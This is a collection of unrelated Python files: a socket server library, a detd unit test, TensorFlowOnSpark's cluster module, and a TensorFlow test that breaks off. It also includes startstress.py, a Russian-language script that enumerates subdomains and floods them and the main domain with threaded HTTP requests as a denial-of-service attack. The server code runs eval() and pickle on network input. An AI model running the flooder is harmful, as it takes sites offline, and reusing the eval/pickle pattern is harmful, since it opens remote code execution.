readable, writable, exceptions = select.select(self.INPUTS, self.OUTPUTS, self.INPUTS)
# handling the inputs
for r in readable:
if r is self.sock:
connection,addr = r.accept()
connection.setblocking(0)
self.INPUTS.append(connection)
self.MESSAGE_QUEUES[connection] = queue.Queue()
else:
ini = list(zip(*data_recv_len))
if len(ini) == 0 or r not in ini[0]:
try:
data_len = pickle.loads(base64.b64decode(r.recv(32).decode().strip("0").encode("utf-8")))
except ConnectionResetError:
print("Client Disconnected")
if r in self.OUTPUTS:
self.OUTPUTS.remove(r)
if r in self.WRITABLE:
self.WRITABLE.remove(r)
self.INPUTS.remove(r)
r.close()
del self.MESSAGE_QUEUES[r]
continue
except Exception as e:
pass
if data_len:
if type(data_len) == type([]):
data_recv_len.append(
[
r,
data_len[0]
]
)
else:
print("User Disconnected")
if r in self.OUTPUTS:
self.OUTPUTS.remove(r)
self.INPUTS.remove(r)
if r in self.WRITABLE:
self.WRITABLE.remove(r)
r.close()
del self.MESSAGE_QUEUES[r]
continue
else:
qwe = list(zip(*data_recv_len))
INDEX = qwe[0].index(r)
try:
recv_len = data_recv_len.pop(INDEX)[1]
data = r.recv(recv_len)
try:
data = data.decode().strip("0").encode("utf-8")
except:
print("Error in decoding")
self.__RECEIVING_MSG.append(data)
self.MESSAGE_QUEUES[r].put(pickle.loads(base64.b64decode(data))[0])
if r not in self.OUTPUTS:
self.OUTPUTS.append(r)
except Exception as e:
print("User Disconnected")
readable.remove(r)
self.INPUTS.remove(r)
writable.remove(r)
self.OUTPUTS.remove(r)
if r in self.WRITABLE:
self.WRITABLE.remove(r)
del self.MESSAGE_QUEUES[r]
continue
# handling the outputs
for w in writable:
if w not in self.WRITABLE:
self.WRITABLE.append(w)
# handling the errors
for e in exceptions:
self.INPUTS.remove(e)
if e in self.OUTPUTS:
self.OUTPUTS.remove(e)
e.close()
del self.MESSAGE_QUEUES[e]
def receive_func(self, __receiving_msg,__varified_devices, __varifier_lst, __client_keys, __outputs, __request_lst, __request_res_lst, __message_lst, __custom_c_m_r):
# __receiving_msg = self.__RECEIVING_MSG,
# __varified_devices = self.__VARIFIED_DEVICES,
# __varifier_lst = self.__VARIFIER_LIST,
# __client_keys = self.__CLIENT_KEYS,
# __outputs = self.OUTPUTS,
# __request_lst = self.REQUEST_LIST
# __request_res_lst = self.REQUEST_RESPONSE_LIST
# __message_lst = self.MESSAGE_LIS
# __custom_c_m_r = self.__CUSTOM_CHANNEL_MSG_REC
while True:
try:
for INDEX,_data_ in enumerate(__receiving_msg):
data = pickle.loads(base64.b64decode(_data_))
# print(f"data[0] : {data[0]}")
# print(f"__varified_devices : {__varified_devices}")
if data[0] not in __varified_devices:
_recv_ = DSP()._convert_to_class(_data_, secure = False)
if _recv_.DSP_type == "username_secure":
resolved_data = eval(_recv_.msg)
aes_key = AESGCM.generate_key(256)
nonce = os.urandom(32)
aad = bytes(self._name_generator(),"utf-8")
qw = {
"aes_key" : aes_key,
"nonce" : nonce,
"aad" : aad,
}
pickle_qw = pickle.dumps(qw)
b64_aes_key_pack = base64.b64encode(pickle_qw)
key = load_ssh_public_key(
bytes(
resolved_data["data"],
"utf-8"
),
backend=default_backend()
)
ciphertext = key.encrypt(
b64_aes_key_pack,
padding.OAEP(
mgf = padding.MGF1(algorithm = hashes.SHA256()),
algorithm = hashes.SHA256(),
label = None
)
)
ciphertext = base64.b64encode(ciphertext)
prepare_data = {"key" : ciphertext}
dsp_data = DSP(
DSP_type="username_secure_response"
)._messanger(
MSG = prepare_data
)
dsp_data = [resolved_data["username"],dsp_data]
__varifier_lst.append(dsp_data)
__varified_devices.append(resolved_data["username"])
__client_keys[resolved_data["username"]] = b64_aes_key_pack
get = self._get_node(
file = self.__file_location,
key = hashlib.sha256(bytes("key","utf-8")).digest(),
wait = False
)
if get is not None:
get[resolved_data["username"]] = b64_aes_key_pack
self._add_node(
file = self.__file_location,
node = [
hashlib.sha256(bytes("key","utf-8")).digest(),
get
]
)
else:
self._add_node(
file = self.__file_location,
node = [
hashlib.sha256(bytes("key","utf-8")).digest(),
{
resolved_data["username"] : b64_aes_key_pack
}
]
)
__receiving_msg.pop(INDEX)
else:
aes_key_pack = __client_keys[data[0]]
_recv_ = DSP()._convert_to_class(
OBJECT = _data_,
secure = True,
secure_dict = aes_key_pack
)
if _recv_.DSP_type == "DSP_REQ":
try:
resolved_data = eval(_recv_.msg)
resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
__request_lst.append(
[
resolved_data["target_name"],
_recv_.msg
]
)
__receiving_msg.remove(_data_)
except:
pass
elif _recv_.DSP_type == "DSP_REQ_RES":
try:
resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
__request_res_lst.append(
[
resolved_data["target_name"],
_recv_.msg
]
)
__receiving_msg.remove(_data_)
except:
pass
elif _recv_.DSP_type == "DSP_MSG":
try:
resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
__message_lst.append(
[
resolved_data['target_name'],
_recv_.msg
]
)
__receiving_msg.remove(_data_)
except:
pass
elif _recv_.DSP_type in self.__CUSTOM_CHANNEL:
try:
resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
__custom_c_m_r.append(resolved_data)
__receiving_msg.remove(_data_)
except:
pass
except:
pass
def send_func(self,Writable,message_q,message_list,requestList,requestResList,varifierList,customChannelMessageSend):
while True:
# print(f"Writable : {Writable}")
# time.sleep(2)
for s in Writable:
if s._closed == True and s.fileno() == -1:
Writable.remove(s)
# try:
try:
username = message_q[s].get_nowait()
message_q[s].put(username)
msg_lst = list(list(zip(*message_list)))
req_lst = list(list(zip(*requestList)))
req_res_lst = list(list(zip(*requestResList)))
vari_lst = list(list(zip(*varifierList)))
send_c_msg = list(zip(*customChannelMessageSend))
except KeyError:
pass
if len(msg_lst) > 0:
if username in msg_lst[0]:
INDEX = msg_lst[0].index(username)
aes_key_pack = self.__CLIENT_KEYS[username]
aes_key_pack = pickle.loads(base64.b64decode(aes_key_pack))
dsp_data = DSP(
DSP_type = "DSP_MSG",
universalAesKey = aes_key_pack["aes_key"],
nonce = aes_key_pack["nonce"],
aad = aes_key_pack["aad"]
)._messanger(
MSG = f"{msg_lst[1][INDEX]}"
).decode().center(len(msg_lst[1][INDEX]) + 100, "|").encode("utf-8")
try:
s.send(bytes(f"{len(dsp_data)}".center(16,"|"),"utf-8"))
s.send(
dsp_data
)
message_list.pop(INDEX)
except OSError:
pass
if len(req_lst) > 0:
if username in req_lst[0]:
INDEX = req_lst[0].index(username)
try:
aes_key_pack = self.__CLIENT_KEYS[username]
except KeyError:
continue
aes_key_pack = pickle.loads(base64.b64decode(aes_key_pack))
dsp_data = DSP(
DSP_type = "DSP_handshake_request",
universalAesKey = aes_key_pack["aes_key"],
nonce = aes_key_pack["nonce"],
aad = aes_key_pack["aad"]
)._messanger(
MSG = f"{req_lst[1][INDEX]}"
).decode().center(len(req_lst[1][INDEX]) + 100, "|").encode("utf-8")
s.send(bytes(f"{len(dsp_data)+100}".center(16,"|"),"utf-8"))
s.send(
dsp_data
)
requestList.pop(INDEX)
if len(req_res_lst) > 0:
if username in req_res_lst[0]:
INDEX = req_res_lst[0].index(username)
aes_key_pack = self.__CLIENT_KEYS[username]
aes_key_pack = pickle.loads(base64.b64decode(aes_key_pack))
dsp_data = DSP(
DSP_type = "DSP_handshake_request_res",
universalAesKey = aes_key_pack["aes_key"],
nonce = aes_key_pack["nonce"],
aad = aes_key_pack["aad"]
)._messanger(
MSG = f"{req_res_lst[1][INDEX]}"
).decode().center(len(req_res_lst[1][INDEX]) + 100, "|").encode("utf-8")
s.send(bytes(f"{len(dsp_data)+100}".center(16,"|"),"utf-8"))
s.send(
dsp_data
)
requestResList.pop(INDEX)
if len(vari_lst) > 0:
if username in vari_lst[0]:
INDEX = vari_lst[0].index(username)
s.send(bytes(f"{len(vari_lst[1][INDEX])}".center(16,"|"),"utf-8"))
s.send(
vari_lst[1][INDEX]
)
varifierList.pop(INDEX)
if len(send_c_msg) > 0:
if username in send_c_msg[0]:
INDEX = send_c_msg[0].index(username)
s.send(bytes(f"{len(send_c_msg[1][INDEX])}".center(16,"|"),"utf-8"))
s.send(send_c_msg[1][INDEX])
customChannelMessageSend.pop(INDEX)
# except:
# pass
def CREATE_CHANNEL(self,channel_name = None, multiple : bool = False):
if multiple:
if type(channel_name) == type([]):
for channel in channel_name:
if channel not in self.__CUSTOM_CHANNEL:
self.__CUSTOM_CHANNEL.append(channel)
else:
print(f"Channel : {channel} already exists.")
else:
raise TypeError("When 'mutliple' is to True then channel_name should be a list of multiple channel names")
else:
if channel_name not in self.__CUSTOM_CHANNEL:
self.__CUSTOM_CHANNEL.append(channel_name)
def LISTEN(self,channel : str = None,function : object = None,args = None):
if channel is not None:
found = False
index = None
if channel in self.__CUSTOM_CHANNEL:
for i,d in enumerate(self.__CUSTOM_CHANNEL_MSG_REC):
if d["channel"] == channel:
found = True
index = i
break
if found:
if args is None:
p_data = self.__CUSTOM_CHANNEL_MSG_REC.pop(index)
self.__CALLBACK_LOOP.append([function,[p_data]])
else:
p_data = self.__CUSTOM_CHANNEL_MSG_REC.pop(index)
args = list(args)
args.insert(0,p_data)
self.__CALLBACK_LOOP.append([function,args])
else:
raise TypeError("'channel' should not be None")
def __callback_loop(self,__callback_loop):
while True:
for index,func in enumerate(__callback_loop):
__callback_loop.pop(index)
func[0](*func[1])
def SEND(self,channel_name,target_name,data):
if channel_name in self.__CUSTOM_CHANNEL:
key_pack = self.__CLIENT_KEYS[target_name]
key_pack = pickle.loads(base64.b64decode(key_pack))
dsp_data = DSP(
DSP_type = channel_name,
universalAesKey=key_pack["aes_key"],
nonce = key_pack["nonce"],
aad= key_pack["aad"]
)._messanger(
MSG = base64.b64encode(pickle.dumps(data))
)
self.__CUSTOM_CHANNEL_MSG_SEND.append(
[
target_name,
dsp_data
]
)
class server():
def __init__(self, secure : bool = True, file : str = None):
"""
This class allows user to create multi-client server.
args:
secure : bool = True -> this should set to the default value True,
file : str = None -> here user need to pass a yaml file which saves all the keys and configurations.
if not specified, will raise an TypeError
"""
if not file:
raise TypeError("asyncServer() missing 1 required positional argument: 'file'")
__parent = MAIN(secure = secure, file = file)
self.SERVER = __parent.SERVER
self.CREATE_CHANNEL = __parent.CREATE_CHANNEL
self.LISTEN = __parent.LISTEN
self.SEND = __parent.SEND
|
test_service.py | #!/usr/bin/env python3
# SPDX-License-Identifier: BSD-3-Clause
# Copyright(C) 2020-2022 Intel Corporation
# Authors:
# Hector Blanco Alcaine
import multiprocessing
import os
import socket
import sys
import time
import unittest
import unittest.mock
from detd import StreamConfiguration
from detd import TrafficSpecification
from detd import Service
from detd import ServiceProxy
from .common import *
def setup_configuration():
interface_name = "eth0"
interval = 20 * 1000 * 1000 # ns
size = 1522 # Bytes
txoffset = 250 * 1000 # ns
addr = "03:C0:FF:EE:FF:AB"
vid = 3
pcp = 6
stream = StreamConfiguration(addr, vid, pcp, txoffset)
traffic = TrafficSpecification(interval, size)
return interface_name, stream, traffic
def setup_proxy():
proxy = ServiceProxy()
return proxy
def run_server(test_mode):
if test_mode == TestMode.TARGET:
with Service() as srv:
srv.run()
elif test_mode == TestMode.HOST:
with Service(test_mode=True) as srv:
srv.run()
def setup_server(test_mode):
uds_address = Service._SERVICE_LOCK_FILE
server = multiprocessing.Process(target=run_server, args=(test_mode,))
server.start()
while not os.path.exists(uds_address):
time.sleep(0.2)
return server
def mock_setup(self, message):
vlan_interface = "{}.{}".format(message.interface, message.vid)
soprio = 6
return vlan_interface, soprio
class TestService(unittest.TestCase):
def setUp(self):
env_var = os.getenv("DETD_TESTENV")
if env_var == "HOST":
self.mode = TestMode.HOST
elif env_var == "TARGET":
self.mode = TestMode.TARGET
else:
self.mode = TestMode.HOST
self.server = setup_server(self.mode)
self.proxy = setup_proxy()
def tearDown(self):
self.server.terminate()
self.server.join()
try:
uds_address = '/tmp/uds_detd_server.sock'
os.unlink(uds_address)
except FileNotFoundError:
pass
def assertSoprioEqual(self, sock, soprio):
actual = sock.getsockopt(socket.SOL_SOCKET, socket.SO_PRIORITY)
self.assertEqual(actual, soprio)
def test_service_setup_talker_socket(self):
interface_name, stream, traffic = setup_configuration()
sock = self.proxy.setup_talker_socket(interface_name, stream, traffic)
# XXX currently this is just testing that the socket priority
# configured by the server is correctly propagated with SCM_RIGHTS
self.assertSoprioEqual(sock, 6)
sock.close()
def test_service_setup_talker(self):
interface_name, stream, traffic = setup_configuration()
vlan_interface, soprio = self.proxy.setup_talker(interface_name, stream, traffic)
self.assertEqual(vlan_interface, "eth0.3")
self.assertEqual(soprio, 7)
if __name__ == '__main__':
unittest.main()
|
TFCluster.py | # Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""
This module provides a high-level API to manage the TensorFlowOnSpark cluster.
There are three main phases of operation:
1. **Reservation/Startup** - reserves a port for the TensorFlow process on each executor, starts a multiprocessing.Manager to
listen for data/control messages, and then launches the Tensorflow main function on the executors.
2. **Data feeding** - *For InputMode.SPARK only*. Sends RDD data to the TensorFlow nodes via each executor's multiprocessing.Manager. PS
nodes will tie up their executors, so they won't receive any subsequent data feeding tasks.
3. **Shutdown** - sends a shutdown control message to the multiprocessing.Managers of the PS nodes and pushes end-of-feed markers into the data
queues of the worker nodes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import logging
import os
import random
import signal
import sys
import threading
import time
from pyspark.streaming import DStream
from . import reservation
from . import TFManager
from . import TFSparkNode
# status of TF background job
tf_status = {}
class InputMode(object):
"""Enum for the input modes of data feeding."""
TENSORFLOW = 0 #: TensorFlow application is responsible for reading any data.
SPARK = 1 #: Spark is responsible for feeding data to the TensorFlow application via an RDD.
class TFCluster(object):
sc = None #: SparkContext
defaultFS = None #: Default FileSystem string, e.g. ``file://`` or ``hdfs://<namenode>/``
working_dir = None #: Current working directory
num_executors = None #: Number of executors in the Spark job (and therefore, the number of nodes in the TensorFlow cluster).
nodeRDD = None #: RDD representing the nodes of the cluster, i.e. ``sc.parallelize(range(num_executors), num_executors)``
cluster_id = None #: Unique ID for this cluster, used to invalidate state for new clusters.
cluster_info = None #: Cluster node reservations
cluster_meta = None #: Cluster metadata dictionary, e.g. cluster_id, defaultFS, reservation.Server address, etc.
input_mode = None #: TFCluster.InputMode for this cluster
queues = None #: *INTERNAL_USE*
server = None #: reservation.Server for this cluster
def train(self, dataRDD, num_epochs=0, feed_timeout=600, qname='input'):
"""*For InputMode.SPARK only*. Feeds Spark RDD partitions into the TensorFlow worker nodes
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD.
Since epochs are implemented via ``RDD.union()`` and the entire RDD must generally be processed in full, it is recommended
to set ``num_epochs`` to closely match your training termination condition (e.g. steps or accuracy). See ``TFNode.DataFeed``
for more details.
Args:
:dataRDD: input data as a Spark RDD.
:num_epochs: number of times to repeat the dataset during training.
:feed_timeout: number of seconds after which data feeding times out (600 sec default)
:qname: *INTERNAL USE*.
"""
logging.info("Feeding training data")
assert self.input_mode == InputMode.SPARK, "TFCluster.train() requires InputMode.SPARK"
assert qname in self.queues, "Unknown queue: {}".format(qname)
assert num_epochs >= 0, "num_epochs cannot be negative"
if isinstance(dataRDD, DStream):
# Spark Streaming
dataRDD.foreachRDD(lambda rdd: rdd.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, feed_timeout=feed_timeout, qname=qname)))
else:
# Spark RDD
# if num_epochs unspecified, pick an arbitrarily "large" number for now
# TODO: calculate via dataRDD.count() / batch_size / max_steps
if num_epochs == 0:
num_epochs = 10
rdds = [dataRDD] * num_epochs
unionRDD = self.sc.union(rdds)
unionRDD.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, feed_timeout=feed_timeout, qname=qname))
def inference(self, dataRDD, feed_timeout=600, qname='input'):
"""*For InputMode.SPARK only*: Feeds Spark RDD partitions into the TensorFlow worker nodes and returns an RDD of results
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD and provide valid data for the output RDD.
This will use the distributed TensorFlow cluster for inferencing, so the TensorFlow "main" function should be capable of inferencing.
Per Spark design, the output RDD will be lazily-executed only when a Spark action is invoked on the RDD.
Args:
:dataRDD: input data as a Spark RDD
:feed_timeout: number of seconds after which data feeding times out (600 sec default)
:qname: *INTERNAL_USE*
Returns:
A Spark RDD representing the output of the TensorFlow inferencing
"""
logging.info("Feeding inference data")
assert self.input_mode == InputMode.SPARK, "TFCluster.inference() requires InputMode.SPARK"
assert qname in self.queues, "Unknown queue: {}".format(qname)
return dataRDD.mapPartitions(TFSparkNode.inference(self.cluster_info, feed_timeout=feed_timeout, qname=qname))
def shutdown(self, ssc=None, grace_secs=0, timeout=259200):
"""Stops the distributed TensorFlow cluster.
For InputMode.SPARK, this will be executed AFTER the `TFCluster.train()` or `TFCluster.inference()` method completes.
For InputMode.TENSORFLOW, this will be executed IMMEDIATELY after `TFCluster.run()` and will wait until the TF worker nodes complete.
Args:
:ssc: *For Streaming applications only*. Spark StreamingContext
:grace_secs: Grace period to wait after all executors have completed their tasks before terminating the Spark application, e.g. to allow the chief worker to perform any final/cleanup duties like exporting or evaluating the model. Default is 0.
:timeout: Time in seconds to wait for TF cluster to complete before terminating the Spark application. This can be useful if the TF code hangs for any reason. Default is 3 days. Use -1 to disable timeout.
"""
logging.info("Stopping TensorFlow nodes")
# identify ps/workers
ps_list, worker_list, eval_list = [], [], []
for node in self.cluster_info:
(ps_list if node['job_name'] == 'ps' else eval_list if node['job_name'] == 'evaluator' else worker_list).append(node)
# setup execution timeout
if timeout > 0:
def timeout_handler(signum, frame):
logging.error("TensorFlow execution timed out, exiting Spark application with error status")
self.sc.cancelAllJobs()
self.sc.stop()
sys.exit(1)
signal.signal(signal.SIGALRM, timeout_handler)
signal.alarm(timeout)
# wait for Spark Streaming termination or TF app completion for InputMode.TENSORFLOW
if ssc is not None:
# Spark Streaming
while not ssc.awaitTerminationOrTimeout(1):
if self.server.done:
logging.info("Server done, stopping StreamingContext")
ssc.stop(stopSparkContext=False, stopGraceFully=True)
break
elif self.input_mode == InputMode.TENSORFLOW:
# in TENSORFLOW mode, there is no "data feeding" job, only a "start" job, so we must wait for the TensorFlow workers
# to complete all tasks, while accounting for any PS tasks which run indefinitely.
count = 0
while count < 3:
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) == 0:
break
stages = st.getActiveStageIds()
for i in stages:
si = st.getStageInfo(i)
if si.numActiveTasks == len(ps_list) + len(eval_list):
# if we only have PS tasks left, check that we see this condition a couple times
count += 1
time.sleep(5)
# shutdown queues and managers for "worker" executors.
# note: in SPARK mode, this job will immediately queue up behind the "data feeding" job.
# in TENSORFLOW mode, this will only run after all workers have finished.
workers = len(worker_list)
workerRDD = self.sc.parallelize(range(workers), workers)
workerRDD.foreachPartition(TFSparkNode.shutdown(self.cluster_info, self.queues))
time.sleep(grace_secs)
# exit Spark application w/ err status if TF job had any errors
if 'error' in tf_status:
logging.error("Exiting Spark application with error status.")
self.sc.cancelAllJobs()
self.sc.stop()
sys.exit(1)
logging.info("Shutting down cluster")
# shutdown queues and managers for "PS" executors.
# note: we have to connect/shutdown from the spark driver, because these executors are "busy" and won't accept any other tasks.
for node in ps_list + eval_list:
addr = node['addr']
authkey = node['authkey']
m = TFManager.connect(addr, authkey)
q = m.get_queue('control')
q.put(None)
q.join()
# wait for all jobs to finish
while True:
time.sleep(5)
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) == 0:
break
def tensorboard_url(self):
"""Utility function to get the Tensorboard URL"""
for node in self.cluster_info:
if node['tb_port'] != 0:
return "http://{0}:{1}".format(node['host'], node['tb_port'])
return None
def run(sc, map_fun, tf_args, num_executors, num_ps, tensorboard=False, input_mode=InputMode.TENSORFLOW,
log_dir=None, driver_ps_nodes=False, master_node=None, reservation_timeout=600, queues=['input', 'output', 'error'],
eval_node=False):
"""Starts the TensorFlowOnSpark cluster and Runs the TensorFlow "main" function on the Spark executors
Args:
:sc: SparkContext
:map_fun: user-supplied TensorFlow "main" function
:tf_args: ``argparse`` args, or command-line ``ARGV``. These will be passed to the ``map_fun``.
:num_executors: number of Spark executors. This should match your Spark job's ``--num_executors``.
:num_ps: number of Spark executors which are reserved for TensorFlow PS nodes. All other executors will be used as TensorFlow worker nodes.
:tensorboard: boolean indicating if the chief worker should spawn a Tensorboard server.
:input_mode: TFCluster.InputMode
:log_dir: directory to save tensorboard event logs. If None, defaults to a fixed path on local filesystem.
:driver_ps_nodes: run the PS nodes on the driver locally instead of on the spark executors; this help maximizing computing resources (esp. GPU). You will need to set cluster_size = num_executors + num_ps
:master_node: name of the "master" or "chief" node in the cluster_template, used for `tf.estimator` applications.
:reservation_timeout: number of seconds after which cluster reservation times out (600 sec default)
:queues: *INTERNAL_USE*
:eval_node: run evaluator node for distributed Tensorflow
Returns:
A TFCluster object representing the started cluster.
"""
logging.info("Reserving TFSparkNodes {0}".format("w/ TensorBoard" if tensorboard else ""))
if driver_ps_nodes and input_mode != InputMode.TENSORFLOW:
raise Exception('running PS nodes on driver locally is only supported in InputMode.TENSORFLOW')
if eval_node and input_mode != InputMode.TENSORFLOW:
raise Exception('running evaluator nodes is only supported in InputMode.TENSORFLOW')
# compute size of TF cluster and validate against number of Spark executors
num_master = 1 if master_node else 0
num_eval = 1 if eval_node else 0
num_workers = max(num_executors - num_ps - num_eval - num_master, 0)
total_nodes = num_ps + num_master + num_eval + num_workers
assert total_nodes == num_executors, "TensorFlow cluster requires {} nodes, but only {} executors available".format(total_nodes, num_executors)
assert num_master + num_workers > 0, "TensorFlow cluster requires at least one worker or master/chief node"
# create a cluster template for scheduling TF nodes onto executors
executors = list(range(num_executors))
cluster_template = {}
if num_ps > 0:
cluster_template['ps'] = executors[:num_ps]
del executors[:num_ps]
if master_node:
cluster_template[master_node] = executors[:1]
del executors[:1]
if eval_node:
cluster_template['evaluator'] = executors[:1]
del executors[:1]
if num_workers > 0:
cluster_template['worker'] = executors[:num_workers]
logging.info("cluster_template: {}".format(cluster_template))
# get default filesystem from spark
defaultFS = sc._jsc.hadoopConfiguration().get("fs.defaultFS")
# strip trailing "root" slash from "file:///" to be consistent w/ "hdfs://..."
if defaultFS.startswith("file://") and len(defaultFS) > 7 and defaultFS.endswith("/"):
defaultFS = defaultFS[:-1]
# get current working dir of spark launch
working_dir = os.getcwd()
# start a server to listen for reservations and broadcast cluster_spec
server = reservation.Server(num_executors)
server_addr = server.start()
# start TF nodes on all executors
logging.info("Starting TensorFlow on executors")
cluster_meta = {
'id': random.getrandbits(64),
'cluster_template': cluster_template,
'num_executors': num_executors,
'default_fs': defaultFS,
'working_dir': working_dir,
'server_addr': server_addr
}
if driver_ps_nodes:
nodeRDD = sc.parallelize(range(num_ps, num_executors), num_executors - num_ps)
else:
nodeRDD = sc.parallelize(range(num_executors), num_executors)
if driver_ps_nodes:
def _start_ps(node_index):
logging.info("starting ps node locally %d" % node_index)
TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tensorboard,
log_dir,
queues,
background=(input_mode == InputMode.SPARK))([node_index])
for i in cluster_template['ps']:
ps_thread = threading.Thread(target=lambda: _start_ps(i))
ps_thread.daemon = True
ps_thread.start()
# start TF on a background thread (on Spark driver) to allow for feeding job
def _start(status):
try:
nodeRDD.foreachPartition(TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tensorboard,
log_dir,
queues,
background=(input_mode == InputMode.SPARK)))
except Exception as e:
logging.error("Exception in TF background thread")
status['error'] = str(e)
t = threading.Thread(target=_start, args=(tf_status,))
# run as daemon thread so that in spark mode main thread can exit
# if feeder spark stage fails and main thread can't do explicit shutdown
t.daemon = True
t.start()
# wait for executors to register and start TFNodes before continuing
logging.info("Waiting for TFSparkNodes to start")
cluster_info = server.await_reservations(sc, tf_status, reservation_timeout)
logging.info("All TFSparkNodes started")
# print cluster_info and extract TensorBoard URL
tb_url = None
for node in cluster_info:
logging.info(node)
if node['tb_port'] != 0:
tb_url = "http://{0}:{1}".format(node['host'], node['tb_port'])
if tb_url is not None:
logging.info("========================================================================================")
logging.info("")
logging.info("TensorBoard running at: {0}".format(tb_url))
logging.info("")
logging.info("========================================================================================")
# since our "primary key" for each executor's TFManager is (host, executor_id), sanity check for duplicates
# Note: this may occur if Spark retries failed Python tasks on the same executor.
tb_nodes = set()
for node in cluster_info:
node_id = (node['host'], node['executor_id'])
if node_id in tb_nodes:
msg = '''
Duplicate cluster node id detected (host={0}, executor_id={1})
Please ensure that:
1. Number of executors >= number of TensorFlow nodes
2. Number of tasks per executors is 1
3, TFCluster.shutdown() is successfully invoked when done.
'''.strip()
raise Exception(msg.format(node_id[0], node_id[1]))
else:
tb_nodes.add(node_id)
# create TFCluster object
cluster = TFCluster()
cluster.sc = sc
cluster.meta = cluster_meta
cluster.nodeRDD = nodeRDD
cluster.cluster_info = cluster_info
cluster.cluster_meta = cluster_meta
cluster.input_mode = input_mode
cluster.queues = queues
cluster.server = server
return cluster
|
startstress.py | print('Загрузка...')
import os
import time
import threading
try:
import requests
except:
os.system('pip install requests')
try:
import colorama
except:
os.system('pip install colorama')
if os.sys.platform == 'win32':
def clear():
os.system('cls')
else:
def clear():
os.system('clear')
clear()
def dos(target, port):
while True:
try:
res = requests.get(target + ":" + port)
print(colorama.Fore.RED + "[+]" +colorama.Fore.YELLOW + "Запрос отправлен!" + colorama.Fore.WHITE)
except requests.exceptions.ConnectionError:
print(colorama.Fore.RED + "[+] " + colorama.Fore.LIGHTGREEN_EX + "Ошибка подключения!" + colorama.Fore.WHITE)
time.sleep(0.1)
threads = 20
url = input(colorama.Fore.BLUE + "Домен: "+ colorama.Fore.YELLOW)
port = input(colorama.Fore.BLUE + "Порт: " + colorama.Fore.YELLOW)
try:
threads = int(input(colorama.Fore.BLUE + "Количество потоков: " + colorama.Fore.YELLOW))
except ValueError:
exit(colorama.Fore.RED + "Неверное количество потоков!")
if threads == 0:
exit(colorama.Fore.RED + "Неверное количество потоков!")
if not url.__contains__("."):
exit(colorama.Fore.RED + "Неверный домен")
subd = open('subd.txt', 'r')
subd = subd.read()
sub = []
l = ''
subb = []
for j in subd:
if not j == '\n':
l = l + j
else:
sub.append(l)
for k in sub:
try:
requests.get('https://' + k + '.' + url + port)
ex = False
except:
ex = True
if ex == False:
subb.append(k)
for h in subb:
print(colorama.Fore.RED + "[+]" + colorama.Fore.LIGHTGREEN_EX + " Запускаю атаку на домен " + h + '.' + url)
for d in range(0, threads):
thr = threading.Thread(target=dos, args=(h + '.' + url, port,))
thr.start()
print(colorama.Fore.RED + "[+]" + colorama.Fore.LIGHTGREEN_EX + " Атака на домен " + h + '.' + url + " запущена")
for i in range(0, threads):
print(colorama.Fore.RED + "[+]" + colorama.Fore.LIGHTGREEN_EX + " Запускаю атаку на основной домен")
thr = threading.Thread(target=dos, args=('https://' + url, port,))
thr.start()
print(colorama.Fore.RED + "[+]" + colorama.Fore.LIGHTGREEN_EX + " Атака на основной домен запущена")
print(colorama.Fore.RED + "[+]" + colorama.Fore.LIGHTGREEN_EX + " DoS атака запущена, ждите")
|
conditional_accumulator_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
# from functools import reduce
class ConditionalAccumulatorTest(test.TestCase):
def testConstructorWithInvalidArg(self):
with ops.Graph().as_default():
with self.assertRaises(ValueError):
data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", reduction_type="Invalid")
@test_util.run_deprecated_v1
def testAccumulatorSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.ConditionalAccumulator(dtypes_lib.float32, name="Q")
self.assertEqual(q.num_accumulated().eval(), 0)
@test_util.run_deprecated_v1
def testAccumulatorSetGlobalStep(self):
with self.cached_session():
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
set_global_step_op = q.set_global_step(1)
set_global_step_op.run()
@test_util.run_deprecated_v1
def testAccumulatorApplyGradFloat32(self):
with self.cached_session():
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
accum_op = q.apply_grad((10.0,))
accum_op.run()
@test_util.run_deprecated_v1
def testDtypes(self):
with self.cached_session() as sess:
dtypes = [dtypes_lib.float16, dtypes_lib.float32, dtypes_lib.float64]
for i in range(len(dtypes)):
dtype = dtypes[i]
q = data_flow_ops.ConditionalAccumulator(
dtype, shape=tensor_shape.TensorShape([1]))
elems = np.arange(10).astype(dtype.as_numpy_dtype)
for e in elems:
q.apply_grad((e,)).run()
result = self.evaluate(q.take_grad(1))
self.assertEqual(sum(elems) / len(elems), result)
@test_util.run_deprecated_v1
def testAccumulatorMultipleAccumulators(self):
with self.cached_session():
